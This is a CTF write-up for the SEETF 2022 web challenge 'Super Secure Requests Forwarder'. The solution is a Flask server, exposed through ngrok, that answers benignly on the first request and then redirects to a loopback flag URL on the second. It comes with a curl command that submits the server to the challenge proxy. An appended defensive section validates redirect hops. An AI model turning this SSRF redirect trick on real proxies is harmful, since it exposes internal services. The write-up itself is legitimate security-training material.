Super-Secure-Requests-Forwarder

Writeup for Super Secure Requests Forwarder (Web) - Social Engineering Experts CTF (2022) 💜

Description

Hide your IP address and take back control of your privacy! Visit websites through our super secure proxy.

Solution

from flask import Flask, redirect, request

# Usage:
#   flask run          (serve this app locally on port 5000)
#   ngrok http 5000    (expose the local app at a public URL)
#   curl -X POST -d "url=http://c0ac-81-103-153-174.ngrok.io/exploit" http://ssrf.chall.seetf.sg:1337/

app = Flask(__name__)
check = True

@app.route("/")
def index():
    return "<a href='https://www.youtube.com/c/CryptoCat23'>👀</a>"

@app.route("/exploit", methods=['GET', 'POST'])
def handle():
    global check
    if check:  # First request = benign
        check = False
        return "First request is benign, why wouldn't the second be?!"
    else:  # Second request = malicious
        check = True
        return redirect("http://127.0.0.1/flag", code=302)
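
A defensive counterpart to the handler above, added here as an example (not from the original writeup or the challenge's own code): assuming the forwarder is exposed because it checks a URL with one request and then fetches it again, this code validates every redirect hop and returns the body of the validated request itself. `check_url`, `safe_fetch`, the in-memory transport, `tester.example` and its address are constructed for illustration.

```python
import ipaddress
from urllib.parse import urljoin, urlsplit

class Blocked(Exception):
    """Raised when a hop targets a non-HTTP scheme or a non-public address."""

def check_url(url, resolve):
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise Blocked(url)
    ip = ipaddress.ip_address(resolve(parts.hostname))
    if not ip.is_global:  # loopback, RFC 1918, link-local, etc.
        raise Blocked(f"{url} resolves to {ip}")

def safe_fetch(url, fetch, resolve, max_hops=3):
    """Validate every hop and return the body of the validated request itself."""
    for _ in range(max_hops + 1):
        check_url(url, resolve)
        # Assumption: fetch() never follows redirects and connects to the validated IP.
        status, headers, body = fetch(url)
        if status not in (301, 302, 303, 307, 308):
            return body  # no second request is made for the same URL
        url = urljoin(url, headers["Location"])
    raise Blocked("too many redirects")

def make_flipflop_fetch():
    """Constructed in-memory transport that behaves like the /exploit handler."""
    state = {"check": True}
    def fetch(url):
        if urlsplit(url).hostname == "127.0.0.1":
            return 200, {}, "internal-only response"
        if state["check"]:
            state["check"] = False
            return 200, {}, "benign"
        state["check"] = True
        return 302, {"Location": "http://127.0.0.1/flag"}, ""
    return fetch

def fake_resolve(host):
    # Constructed mapping for offline use; literal IPs are returned unchanged.
    return {"tester.example": "93.184.216.34"}.get(host, host)

def demo():
    fetch, url = make_flipflop_fetch(), "http://tester.example/exploit"
    first = safe_fetch(url, fetch, fake_resolve)
    try:
        return first, safe_fetch(url, fetch, fake_resolve)
    except Blocked as exc:
        return first, f"blocked: {exc}"
```

`demo()` calls the forwarder twice against the flip-flopping server: the first call returns the benign body, and the second is rejected at the redirect hop instead of reaching the loopback address.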
